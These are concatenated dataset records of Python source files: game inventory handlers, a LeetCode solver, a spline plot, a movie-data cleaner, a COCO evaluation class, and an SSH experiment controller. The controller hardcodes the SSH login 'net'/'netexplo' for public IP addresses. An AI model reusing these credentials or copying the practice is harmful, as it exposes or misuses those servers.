obj.beibao[from_idx]:\n return\n item = obj.beibao[from_idx]\n obj.beibao[from_idx] = 0\n obj.cangku[to_idx] = item\n obj.show_beibao_item(from_idx)\n obj.show_cangku_item(to_idx)\n obj.tell_object('E09', 1)\n\n@route('E10', require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_from_cangku(obj, data):\n ''' 从仓库拖动东西到背包 '''\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n if obj.query_empty_count() <= 0:\n return\n from_idx, to_idx = data.from_pos - 1, data.to_pos - 1\n if from_idx >= len(obj.cangku) or to_idx >= len(obj.beibao):\n return\n if obj.beibao[to_idx] or not obj.cangku[from_idx]:\n return\n item = obj.cangku[from_idx]\n obj.cangku[from_idx] = 0\n obj.beibao[to_idx] = item\n obj.show_cangku_item(from_idx)\n obj.show_beibao_item(to_idx)\n obj.tell_object('E10', 1)\n\n@route('E11', require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_item_in_cangku(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E11',CANNT_USE_ITEM)\n return\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n from_idx,to_idx = data.from_pos -1, data.to_pos - 1\n if from_idx < 0 or from_idx >= len(obj.cangku) or not obj.cangku[from_idx]:\n obj.tell_object('E11',ITEM_NOT_EXIST)\n return\n from_item = obj.cangku[from_idx]\n to_item = obj.cangku[to_idx]\n if from_item and to_item and is_prop(from_item[KEY_TID]) and from_item[KEY_TID] == to_item[KEY_TID] and from_item[KEY_BIND] == to_item[KEY_BIND]:\n from_amount, to_amount = from_item[KEY_AMOUNT], to_item[KEY_AMOUNT]\n max_stack = query_max_stack(from_item[KEY_TID])\n if from_amount + to_amount > max_stack:\n to_item[KEY_AMOUNT] = max_stack\n from_item[KEY_AMOUNT] -= max_stack - to_amount\n else:\n to_item[KEY_AMOUNT] += from_amount\n obj.empty_cangku_item(from_idx,broad = False)\n else:\n obj.cangku[from_idx],obj.cangku[to_idx] = obj.cangku[to_idx],obj.cangku[from_idx]\n obj.show_cangku_item(from_idx)\n obj.show_cangku_item(to_idx)\n obj.tell_object(\"E11\",1)\n\n@route('E12', require_para = item_pb2.ItemSplit)\n@cmd_exception_catch()\ndef item_split_in_cangku(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E12',CANNT_USE_ITEM)\n return\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n idx = data.position - 1\n if idx < 0 or idx >= len(obj.cangku):\n obj.tell_object('E12',-2)\n return\n if not obj.cangku[idx]:\n obj.tell_object('E12',-2)\n return\n if obj.cangku[idx][KEY_AMOUNT] <= data.amount:\n Obj.tell_object('E12',-3)\n return\n if obj.query_cangku_empty_count() <= 0:\n obj.tell_object('E12',-1)\n return\n old_item = obj.cangku[idx]\n new_item = copy(old_item)\n old_item[KEY_AMOUNT] -= data.amount\n new_item[KEY_AMOUNT] = data.amount\n obj.show_cangku_item(idx)\n obj.add_to_cangku(new_item, can_combine = False)\n obj.tell_object('E12',1)\n\n@route('E13')\n@cmd_exception_catch()\ndef sort_cangku(obj,data):\n ''' 仓库整理 '''\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n if not obj.valid_use_item():\n obj.tell_object('E13',CANNT_USE_ITEM)\n return\n obj.combine_cangku_items()\n obj.cangku.sort(bag_cmper)\n obj.tell_object('E01', 2, get_store_pb2(obj.cangku))\n obj.tell_object('E13',1)\n\n@route('E67',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_lug_to_bar(obj,data):\n '''将背包中的行囊拖放到行囊栏\n arg: 背包索引|行囊栏索引'''\n if not obj.valid_use_item():\n obj.tell_object('E67',CANNT_USE_ITEM)\n return\n bag_idx, lug_idx = int(data.from_pos) - 1, int(data.to_pos) - 1\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or not obj.beibao[bag_idx]:\n obj.tell_object('E67',ITEM_NOT_EXIST)\n return\n# if obj.trading:\n# obj.tell_object('E67',TRADE_LOCKED)\n# return\n if prop.query_typ(obj.beibao[bag_idx][KEY_TID]) != TYP_LUG:\n obj.tell_object('E67',NOT_LUG)\n if lug_idx < 0 or lug_idx >= LUG_BAR_SZ:\n obj.tell_object('E67',LUG_POS_OVERFLOW)\n if obj.lug_bar[lug_idx]:\n result = prop.replace_lug(obj,bag_idx,obj.beibao[bag_idx],lug_idx)\n if result == True:\n obj.tell_object('E67',1)\n else:\n obj.tell_object('E67',result)\n else:\n for i,item in enumerate(obj.lug_bar):\n if not item:\n if i != lug_idx:\n logging.warn(\"use lug: found prev empty lug position %s than position from client:%s \",i,lug_idx)\n prop.use_lug(obj,bag_idx,obj.beibao[bag_idx],i)\n break\n\n@route('E68',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef unapply_lug(obj,data):\n '''将行囊栏的行囊拖放至背包栏'''\n if not obj.valid_use_item():\n obj.tell_object('E68',CANNT_USE_ITEM)\n return\n# if obj.trading:\n# obj.tell_object('E68',TRADE_LOCKED)\n# return\n bag_idx, lug_idx = int(data.to_pos) - 1, int(data.from_pos) - 1\n if lug_idx < 0 or lug_idx >= len(obj.lug_bar) or not obj.lug_bar[lug_idx]:\n obj.tell_object('E68',ITEM_NOT_EXIST)\n return\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or obj.beibao[bag_idx]:\n obj.tell_object('E68',ITEM_NOT_EXIST)\n return\n start_idx = DEF_BEIBAO_SZ\n\n for i in range(lug_idx):\n start_idx += prop.query_typ_data(obj.lug_bar[i][KEY_TID])[1]\n lug_size = prop.query_typ_data(obj.lug_bar[lug_idx][KEY_TID])[1]\n end_idx = start_idx + lug_size\n if bag_idx >= start_idx and bag_idx < end_idx:\n obj.tell_object('E68',CANNT_DRAG_TO)\n return\n seg_used = obj.query_used_count(start_idx,end_idx)\n if obj.query_empty_count(lock_seg = (start_idx,end_idx)) < seg_used + 1:\n obj.tell_object('E68',BAG_FULL)\n return\n for sub_idx,item in enumerate(obj.beibao[start_idx : end_idx]):\n if not item:\n continue\n obj.add_to_bag(item,lock_seg = (start_idx,end_idx))\n obj.empty_beibao_item(start_idx + sub_idx,broad = False)\n obj.add_to_bag(obj.lug_bar[lug_idx],lock_seg = (start_idx,end_idx))\n obj.empty_lug_item(lug_idx)\n obj.reset_beibao_seg(start_idx,end_idx,0)\n obj.tell_object('E68',1)\n\n@route('E69',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_eqp_to_bar(obj,data):\n '''从背包向装备栏拖放装备'''\n if not obj.valid_use_item():\n obj.tell_object('E69',CANNT_USE_ITEM)\n return\n bag_idx, eqp_pos = int(data.from_pos) - 1, int(data.to_pos)\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or not obj.beibao[bag_idx]:\n obj.tell_object('E69',ITEM_NOT_EXIST)\n return\n# if obj.trading:\n# obj.tell_object('E69',TRADE_LOCKED)\n# return\n if data.taskid:\n tid = obj.beibao[bag_idx][KEY_TID]\n result = apply_equip(obj,bag_idx,obj.beibao[bag_idx],eqp_pos)\n if isinstance(result, int) and result < 0:\n obj.tell_object('E69',result)\n else:\n if data.taskid:\n obj.task_use_item(tid)\n obj.tell_object('E69',1)\n\n@route('E66',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef unapply_equip(obj,data):\n '''从装备栏将装备拖放至背包'''\n if not obj.valid_use_item():\n obj.tell_object('E66',-18)\n return\n eqp_pos = int(data.from_pos)\n bag_idx, eqp_idx = int(data.to_pos) - 1, int(data.from_pos) - 1\n if eqp_idx < 0 or eqp_idx >= len(obj.eqp_bar) or not obj.eqp_bar[eqp_idx]:\n obj.tell_object('E66',ITEM_NOT_EXIST)\n return\n if bag_idx < 0 or bag_idx >= len(obj.beibao) or obj.beibao[bag_idx]:\n obj.tell_object('E66',BAG_IDX_INVALID)\n return\n has_eqp_buff = False\n eqp = obj.eqp_bar[eqp_idx]\n obj.beibao[bag_idx] = eqp\n obj.empty_eqp_item(eqp_idx)\n obj.show_beibao_item(bag_idx)\n if eqp_idx+ 1 in attack_pos:\n if KEY_FULING in eqp:\n has_eqp_buff = True\n elif eqp_idx + 1 in def_pos:\n if KEY_FULING in eqp:\n has_eqp_buff = True\n if eqp_idx != MOUNT_EQP_IDX:\n if eqp[KEY_NAIJIU]:\n calc_eqp_attr(eqp, obj.fight[\"l1\"], obj.fight[\"l2\"], obj.fight[\"l2p\"], unapply = True)\n equip.replace_equip_san(obj, eqp_idx, eqp, unapply = True)\n obj.merge_fight()\n else:\n if equip.replace_equip_san(obj, eqp_idx, eqp, unapply = True):\n obj.merge_fight()\n elif obj.mounting or obj.multi_mounting:\n obj.unmount()\n if eqp_idx == 2 or eqp_idx == 12:\n res = role_pb2.RoleChangeDress()\n res.id = obj.gid\n res.type = eqp_idx + 1\n obj.map_obj.tell_room(\"B19\",1,res)\n if has_eqp_buff:\n cal_eqp_buff(obj)\n obj.tell_object('E66',1)\n\n@route(\"E30\")\n@cmd_exception_catch()\ndef extend_cangku(obj, data):\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n page = len(obj.cangku) / CANGKU_SZ\n if page >= 12:\n obj.tell_object(\"E30\", -1)\n return\n if page <= 2:\n cost_money = 50000 if page == 1 else 10000\n if not obj.has_money(cost_money):\n obj.tell_object(\"E30\", -2)\n return\n obj.pay_money(cost_money)\n else:\n if not obj.has_item(CANGKU_PROP):\n obj.tell_object(\"E30\", -2)\n return\n obj.reduce_items({CANGKU_PROP : 1})\n obj.cangku += [0] * CANGKU_SZ\n res = item_pb2.StoreSize()\n res.size = len(obj.cangku)\n obj.tell_object(\"E30\", 1, res)\n\n@route(\"E28\", require_para = item_pb2.Money)\n@cmd_exception_catch()\ndef save_money_to_cangku(obj, data):\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n val = data.money\n if not obj.has_money(val):\n return\n obj.add_ck_money(val)\n obj.pay_money(val)\n res = item_pb2.Money()\n res.money = obj.ck_money\n obj.tell_object(\"E28\", 1, res)\n\n@route(\"E29\", require_para = item_pb2.Money)\n@cmd_exception_catch()\ndef draw_money_from_cangku(obj, data):\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n val = data.money\n if not obj.has_ck_money(val):\n return\n obj.reduce_ck_money(val)\n obj.gain_money(val)\n res = item_pb2.Money()\n res.money = obj.ck_money\n obj.tell_object(\"E29\", 1, res)\n\n\n","sub_path":"yuanneng/item_store.py","file_name":"item_store.py","file_ext":"py","file_size_in_byte":37465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"618448240","text":"# Given a string that contains only digits 0-9 and a target value, return\n# all possibilities to add binary operators (not unary) +, -, or * between\n# the digits so they evaluate to the target value.\n\n# Examples: \n# \"123\", 6 -> [\"1+2+3\", \"1*2*3\"] \n# \"232\", 8 -> [\"2*3+2\", \"2+3*2\"]\n# \"105\", 5 -> [\"1*0+5\",\"10-5\"]\n# \"00\", 0 -> [\"0+0\", \"0-0\", \"0*0\"]\n# \"3456237490\", 9191 -> []\n\n# Credits: Special thanks to @davidtan1890 for adding this problem and\n# creating all test cases.\n\nfrom itertools import chain\n\nOPS = [\n \"\",\n \"+\",\n \"-\",\n \"*\",\n]\n\ndef nextOp():\n yield('+')\n yield('-')\n yield('*')\n\nclass Solution(object):\n def addOperators(self, num, target):\n \"\"\"\n :type num: str\n :type target: int\n :rtype: List[str]\n \"\"\"\n if len(num) == 0:\n return []\n\n results = []\n numlist = [int(c) for c in num]\n stack = [(numlist[0], next(nextOp()))]\n while True:\n curtot, opgen = stack[-1]\n if len(stack) == len(numlist):\n if curtot == target:\n restr = ''.join(chain(elem for elem in stack))\n","sub_path":"ExpressionAddOperators.py","file_name":"ExpressionAddOperators.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"451923517","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n#%matplotlib inline\nimport random\n\n# set seed to reproducible\nrandom.seed(1)\ndata_size = 51\nmax_value_range = 132651\nx = np.array([random.random()*max_value_range for p in range(0,data_size)])\ny = np.array([random.random()*max_value_range for p in range(0,data_size)])\nz = 2*x*x*x + np.sqrt(y)*y + random.random()\n#fig = plt.figure(figsize=(10,6))\n#ax = axes3d.Axes3D(fig)\n#ax.scatter3D(x,y,z, c='r')\n\nn = 132651\nn = 13265\nx_grid = np.linspace(0, n, 1000*len(x))\ny_grid = np.linspace(0, n, 1000*len(y))\nB1, B2 = np.meshgrid(x_grid, y_grid, indexing='xy')\nZ = np.zeros((x.size, z.size))\n\nimport scipy as sp\nimport scipy.interpolate\nspline = sp.interpolate.Rbf(x,y,z,function='thin_plate',smooth=5, episilon=5)\n\nZ = spline(B1,B2)\nfig = plt.figure(figsize=(10,6))\nax = axes3d.Axes3D(fig)\nax.plot_wireframe(B1, B2, Z)\nax.plot_surface(B1, B2, Z,alpha=0.2)\nax.scatter3D(x,y,z, c='r')\nplt.show()\n","sub_path":"Miscellaneous/3d_plots/spline.py","file_name":"spline.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"364369458","text":"import ssh\nimport time\nimport re\nimport os\nfrom shutil import copyfile\n\nimport nonsyn\nimport syn\n\n#the name of the screen will be globalc/localc on each server.\n#the screen log file would be written to /tmp/globalc.log, /tmp/localc.log\n#the screen configuration file would be /tmp/globalc.screenrc, /tmp/localc/screenrc\n\ndef launch_controllers(global_addr, local_addr_list, interval_length, enableReactive, version, scale_down_interval):\n name = 'net'\n pwd = 'netexplo'\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n \n ssh.exec_cmd(global_client, \"rm -f /home/net/globalc/globalc.cfg\")\n ssh.exec_cmd(global_client, 'echo \"'+version+'\" >> /home/net/globalc/globalc.cfg')\n ssh.exec_cmd(global_client, 'echo \"'+str(len(local_addr_list))+'\" >> /home/net/globalc/globalc.cfg')\n ssh.exec_cmd(global_client, 'echo \"'+interval_length+'\" >> /home/net/globalc/globalc.cfg')\n\n ssh.create_screen(global_client, '/tmp/globalc.screenrc', '/tmp/globalc.log', 'globalc')\n ssh.exec_cmd_in_screen(global_client, 'globalc', 'java -jar /home/net/globalc/jar/globalc.jar')\n print (\"Creating global controller on server:\"+global_addr)\n time.sleep(1)\n\n for i in range(0, len(local_client_list)):\n local_addr = local_addr_list[i]\n local_client = local_client_list[i]\n local_addr_split = local_addr.split('.')\n index = int(local_addr_split[3])-145\n ssh.exec_cmd(local_client, \"rm -f /home/net/floodlight/localc.cfg\")\n ssh.exec_cmd(local_client, 'echo \"'+enableReactive+'\" >> /home/net/floodlight/localc.cfg')\n ssh.exec_cmd(local_client, 'echo \"'+str(index)+'\" >> /home/net/floodlight/localc.cfg')\n ssh.exec_cmd(local_client, 'echo \"'+str(scale_down_interval)+'\" >> /home/net/floodlight/localc.cfg')\n\n ssh.create_screen(local_client, '/tmp/localc.screenrc', '/tmp/localc.log', 'localc')\n ssh.exec_cmd_in_screen(local_client, 'localc', 'cd ~/floodlight/')\n ssh.exec_cmd_in_screen(local_client, 'localc', 'sudo ./run')\n print (\"Creating local controller on server:\"+local_addr)\n time.sleep(1)\n\n global_client.close()\n for local_client in local_client_list:\n local_client.close()\n\ndef destroy_vm(client, addr):\n successful = False\n while successful == False:\n output_list, exit_code, r = ssh.exec_cmd(client, 'virsh list --all')\n successful = True\n for each in output_list:\n if 'CONTROL' in each or 'DATA' in each:\n successful = False\n split_list = re.findall(r'\\S+', each)\n vm_num = split_list[0]\n \n print ('Executing virsh destroy '+vm_num)\n ssh.exec_cmd(client, 'virsh destroy '+vm_num)\n\n print ('All vms have been destroyed on server:'+addr)\n\ndef clear_environment(client, addr):\n ssh.exec_cmd(client, 'sudo /home/net/floodlight/clean-env.sh')\n print ('Environment has been cleared on server:'+addr)\n\ndef shutdown_controllers(global_addr, local_addr_list):\n name='net'\n pwd = 'netexplo'\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n\n print (\"Start shutting down controller on each server.\")\n ssh.kill_screen(global_client, 'globalc')\n print ('Screen globalc has been shutdown on server:'+global_addr)\n for i in range(0,len(local_addr_list)):\n ssh.kill_screen(local_client_list[i], 'localc')\n print ('Screen localc has been shutdown on server:'+local_addr_list[i])\n\n print (\"Start destroying vms on each server.\")\n for i in range(0,len(local_addr_list)):\n destroy_vm(local_client_list[i], local_addr_list[i])\n\n print (\"Start clearing runtime environment on each server.\")\n for i in range(0,len(local_addr_list)):\n clear_environment(local_client_list[i], local_addr_list[i])\n\n global_client.close()\n for local_client in local_client_list:\n local_client.close()\n\n\ndef is_init_finish():\n copyfile('/tmp/globalc.log', '/tmp/inspect')\n inspect = open('/tmp/inspect')\n inspect_list = inspect.readlines()\n\n init_finish = False\n\n for line in inspect_list:\n if 'current scaling interval finish,interval:0' in line:\n init_finish = True\n\n inspect.close()\n return init_finish\n\ndef check_all_zero(l):\n all_zero = True\n \n for e in l:\n if e != 0:\n all_zero = False\n break\n\n return all_zero\n\ndef check_all_one(l):\n all_one = True\n \n for e in l:\n if e != 1:\n all_one = False\n break\n\n return all_one\n\n\ndef check_finish(dc_num):\n copyfile('/tmp/globalc.log', '/tmp/inspect')\n inspect = open('/tmp/inspect')\n inspect_list = inspect.readlines()\n\n init_finish = False\n last_new_provision_linenum = 0\n last_provision_linenum = 0\n\n\n for i in range(0, len(inspect_list)):\n reverse_i = len(inspect_list)-1-i\n reverse_line = inspect_list[reverse_i]\n if 'Dataplane new provision::' in reverse_line:\n last_new_provision_linenum = reverse_i\n break\n\n all_zero = True\n for i in range(last_new_provision_linenum+2, last_new_provision_linenum+2+dc_num):\n line = inspect_list[i]\n l = [int(s) for s in re.findall(r'\\d+', line)]\n if (check_all_zero(l) == False):\n all_zero = False\n break\n\n for i in range(0, len(inspect_list)):\n reverse_i = len(inspect_list)-1-i\n reverse_line = inspect_list[reverse_i]\n if 'Dataplane provision:' in reverse_line:\n last_provision_linenum = reverse_i\n break\n\n all_one = True\n for i in range(last_provision_linenum+2, last_provision_linenum+2+dc_num):\n line = inspect_list[i]\n l = [int(s) for s in re.findall(r'\\d+', line)]\n if (check_all_one(l) == False):\n all_one = False\n break\n\n inspect.close()\n return all_zero and all_one\n\ndef check_scaling_interval():\n inspect = open('/tmp/globalc.log')\n inspect_list = inspect.readlines()\n\n init_finish = False\n linenum = 0\n\n for i in range(0, len(inspect_list)):\n reverse_i = len(inspect_list)-1-i\n reverse_line = inspect_list[reverse_i]\n if 'current scaling interval finish,interval:' in reverse_line:\n linenum = reverse_i\n break\n\n line = inspect_list[linenum]\n line_split = line.split(\":\")\n scaling_interval = str(line_split[3])\n\n inspect.close()\n return scaling_interval\n\ndef grep_check(client, file_name, grep_word):\n output_list, exit_code, return_val = ssh.exec_cmd(client, 'grep \"'+grep_word+'\" '+file_name)\n if len(output_list)>0 and exit_code == 0:\n return True\n else:\n return False\n\ndef check_connection(global_client, local_client_list):\n name = \"net\"\n pwd = \"netexplo\"\n\n error_flag = False\n\n if grep_check(global_client, \"/tmp/globalc.log\", \"ERROR\") or grep_check(global_client, \"/tmp/globalc.log\", \"Exception\"):\n error_flag = True\n\n for local_client in local_client_list:\n if grep_check(local_client, \"/tmp/localc.log\", \"Disconnected connection\"):\n error_flag = True\n\n return error_flag\n\ndef check_exp_good(global_addr, local_addr_list):\n name = \"net\"\n pwd = \"netexplo\"\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n\n error_flag = False\n\n if grep_check(global_client, \"/tmp/globalc.log\", \"ERROR\") or grep_check(global_client, \"/tmp/globalc.log\", \"Exception\"):\n error_flag = True\n\n for local_client in local_client_list:\n if grep_check(local_client, \"/tmp/localc.log\", \"ERROR\") or grep_check(local_client, \"/tmp/localc.log\", \"Exception\") or grep_check(local_client, \"/tmp/localc.log\", \"Disconnected connection\"):\n error_flag = True\n\n global_client.close()\n for local_client in local_client_list:\n local_client.close()\n return error_flag\n\ndef compute_num(global_client, local_client_list):\n l,e,r = ssh.exec_cmd(global_client, 'grep -o \"global-call-report\" /tmp/globalt.log | wc -l')\n call_num = int(l[0])*2\n\n counter = 0\n for local_client in local_client_list:\n l,e,r = ssh.exec_cmd(local_client, 'grep -o \"call report\" /tmp/localt.log | wc -l')\n counter += int(l[0])\n\n if 0.9*float(call_num)>float(counter):\n return True\n else:\n return False\n\ndef test_compute_num():\n global_addr = '202.45.128.147'\n local_addr_list = ['202.45.128.148', '202.45.128.149', '202.45.128.152', '202.45.128.151']\n name = \"net\"\n pwd = \"netexplo\"\n\n global_client = ssh.reliable_client_creation(global_addr, name, pwd)\n local_client_list = []\n for i in range(0, len(local_addr_list)):\n local_addr = local_addr_list[i]\n local_client = ssh.reliable_client_creation(local_addr, name, pwd)\n local_client_list.append(local_client)\n\n return compute_num(global_client, local_client_list)","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":9643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"48779627","text":"import numpy as np\nimport pandas as pd\nimport click\nimport os\nfrom pandas.api.types import is_numeric_dtype\n\ndef _convert_str_to_dataframe(string, movie_id, prefix, id_name, value_name):\n \"\"\"\n Convert a string representation of an array of json objects into a data frame\n\n Args:\n string: string representation of an array of json objects\n movie_id: movie_id that is at the same row as the string\n prefix: prefix added to the column names.\n Returns:\n a dataframe representation of the json array\n \"\"\"\n if pd.notnull(string):\n lst = eval(string)\n # if the string representation is not a list\n # treat it as an empty list\n if type(lst) != list:\n lst = [{id_name: np.nan, value_name: np.nan}]\n else:\n lst = [{id_name: np.nan, value_name: np.nan}]\n frame = pd.DataFrame(lst)\n frame.columns = [prefix + c for c in frame.columns]\n frame['movie_id'] = movie_id\n return frame\n\n\ndef _reorganize_many_to_many_column(data, col_name, movie_id_col, prefix, id_name, value_name):\n \"\"\"\n helper function to create a entity data set and a relationship data set based on\n the column that contains array of json object\n\n Args:\n data: input data that contains the column of json arrary\n col_name: column that contains a json array\n movie_id_col: column that specifies the column id, and the id will be used in the relationship dataset\n prefix: prefix added to the column names of the entity data set and and the\n column names of the relationship data set(prefix will not be added to movie_id column)\n id_name: name of the id column in the json object\n value_name: name of the value column in the json object\n Returns:\n an entity data set and a relationship dataset\n \"\"\"\n data_to_stack = []\n for idx, row in data.iterrows():\n json_array_str = row[col_name]\n frame = _convert_str_to_dataframe(json_array_str, row[movie_id_col], prefix, id_name, value_name)\n data_to_stack.append(frame)\n\n concat_data = pd.concat(data_to_stack, axis=0)\n if is_numeric_dtype(concat_data[prefix + id_name]):\n concat_data[prefix + id_name] = concat_data[prefix + id_name].astype('Int64')\n concat_data_summary = concat_data.groupby([prefix + id_name, prefix + value_name]).size().reset_index()\n concat_data_summary = concat_data_summary[[prefix + id_name, prefix + value_name]]\n relationship_data = concat_data[['movie_id', prefix + id_name]]\n return concat_data_summary, relationship_data\n\ndef _reorganize_many_to_one_column(data, col_name, prefix):\n \"\"\"\n helper function to transform the each column of json objects into a data frame\n Args:\n data: data that contains the column of json object\n col_name: name of the column that stores the json objects\n prefix: prefix added to the column names of the output data\n Returns:\n a dataframe representation of the json column\n \"\"\"\n lst_of_obs = []\n for idx, row in data.iterrows():\n lst_of_obs.append(eval(row[col_name]) if pd.notnull(row[col_name]) else {})\n lst_of_obs = [e if type(e) == dict else {} for e in lst_of_obs]\n data = pd.DataFrame(lst_of_obs)\n data.columns = [prefix + name for name in data.columns]\n return data\n\ndef reorganize_meta_data(meta_data):\n \"\"\"\n Function that removes columns of json objects or columns of json arrays, and transform those columns into independent dataframes\n Args:\n meta_data: dataframe\n \"\"\"\n output_dict = dict()\n # columns that store json arrays\n for col in ['genres', 'production_companies', 'production_countries', 'spoken_languages']:\n if col == 'genres' or col == 'production_companies':\n id_name = 'id'\n elif col == 'production_countries':\n id_name = 'iso_3166_1'\n else:\n id_name = 'iso_639_1'\n value_name = 'name'\n summary_data, relationship = _reorganize_many_to_many_column(meta_data, col, 'id',\n col + '_', id_name, value_name)\n output_dict[col + '_data'] = summary_data\n output_dict['movie_' + col + '_relation'] = relationship\n # deal with belongs_to_collection column, which stores json objects instead of json arrays\n data = _reorganize_many_to_one_column(meta_data, 'belongs_to_collection', 'collection_')\n # remove columns of json arrays and json objects\n clean_meta_data = pd.concat([meta_data, data], axis = 1).drop(columns = ['genres', 'production_companies', \\\n 'production_countries', 'spoken_languages',\\\n 'belongs_to_collection'] )\n output_dict['clean_meta_data'] = clean_meta_data\n return output_dict\n\n\n\n@click.command()\n@click.option('--raw_data_path', required=True)\n@click.option('--output_path', required=True)\ndef main(raw_data_path, output_path):\n \"\"\"\n main function that takes the original raw movie data set, and then conducts data cleaning,\n and stores the clean data into the output_path\n Args:\n raw_data_path: path string to the raw movie data set\n output_path: path string to store the clean data\n \"\"\"\n raw_data_path = r'{}'.format(raw_data_path)\n all_raw_data_files = os.listdir(raw_data_path)\n data_names = [name.split('.')[0] for name in all_raw_data_files]\n clean_data_dict = dict()\n for i in range(len(all_raw_data_files)):\n read_file = r'{}\\{}'.format(raw_data_path, all_raw_data_files[i])\n raw_data = pd.read_csv(read_file)\n if data_names[i] == 'movies_metadata':\n output_data_sets = reorganize_meta_data(raw_data)\n for key, value in output_data_sets.items():\n clean_data_dict[key] = value\n elif data_names[i] == 'keyword':\n output_data_sets = _reorganize_many_to_many_column(raw_data, 'keywords', 'id',\n 'keyword_', 'id', 'name')\n for key, value in output_data_sets.items():\n clean_data_dict[key] = value\n else:\n clean_data_dict[data_names[i]] = raw_data\n for key, value in output_data_sets.items():\n save_file = r'{}\\{}'.format(output_path, key + '.csv')\n value.to_csv(save_file, index=False)\n\nif __name__ == '__main__':\n main()","sub_path":"data analysis/data manipulation.py","file_name":"data manipulation.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"635074355","text":"# ------------------------------------------------------------------------------\n# Copyright (c) Microsoft\n# Licensed under the MIT License.\n# The code is based on HigherHRNet-Human-Pose-Estimation and cocoapi.\n# (https://github.com/HRNet/HigherHRNet-Human-Pose-Estimation)\n# (https://github.com/cocodataset/cocoapi)\n# Modified by Zigang Geng (aa397601@mail.ustc.edu.cn).\n# ------------------------------------------------------------------------------\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport logging\nimport os\nimport os.path\n\nimport cv2\nimport json_tricks as json\nimport numpy as np\nimport pickle\nfrom torch.utils.data import Dataset\n\nfrom pycocotools.cocoeval import COCOeval\nfrom utils import zipreader\nfrom .COCODataset import CocoDataset\n\nlogger = logging.getLogger(__name__)\n\n\nclass COCOeval_Rescore_Data(COCOeval):\n def __init__(self, cocoGt=None, cocoDt=None, iouType='segm'):\n COCOeval.__init__(self, cocoGt, cocoDt, iouType)\n self.summary = [['pose', 'pose_heatval', 'oks']]\n \n def evaluateImg(self, imgId, catId, aRng, maxDet):\n '''\n get predicted pose and oks score for single category and image\n change self.summary\n '''\n p = self.params\n if p.useCats:\n gt = self._gts[imgId,catId]\n dt = self._dts[imgId,catId]\n else:\n gt = [_ for cId in p.catIds for _ in self._gts[imgId,cId]]\n dt = [_ for cId in p.catIds for _ in self._dts[imgId,cId]]\n if len(gt) == 0 and len(dt) ==0:\n return None\n \n for g in gt:\n if g['ignore'] or (g['area']aRng[1]):\n g['_ignore'] = 1\n else:\n g['_ignore'] = 0\n\n # sort dt highest score first, sort gt ignore last\n gtind = np.argsort([g['_ignore'] for g in gt], kind='mergesort')\n gt = [gt[i] for i in gtind]\n dtind = np.argsort([-d['score'] for d in dt], kind='mergesort')\n dt = [dt[i] for i in dtind[0:maxDet]]\n # load computed ious\n ious = self.ious[imgId, catId][:, gtind] if len(self.ious[imgId, catId]) > 0 else self.ious[imgId, catId]\n\n gtIg = np.array([g['_ignore'] for g in gt])\n if not len(ious)==0:\n for dind, d in enumerate(dt):\n # information about best match so far (m=-1 -> unmatched)\n iou = 0\n m = -1\n for gind, g in enumerate(gt):\n #if not iscrowd[gind]:\n # continue\n # if dt matched to reg gt, and on ignore gt, stop\n if m>-1 and gtIg[m]==0 and gtIg[gind]==1:\n break\n # continue to next gt unless better match made\n if ious[dind,gind] < iou:\n continue\n # if match successful and best so far, store appropriately\n iou=ious[dind,gind]\n m=gind\n \n dtkeypoint = np.array(d['keypoints']).reshape((17,3))\n self.summary.append([dtkeypoint[:,:2], dtkeypoint[:,2:], iou])\n\n def dumpdataset(self, data_file):\n pickle.dump(self.summary, open(data_file, 'wb'))\n\n\nclass 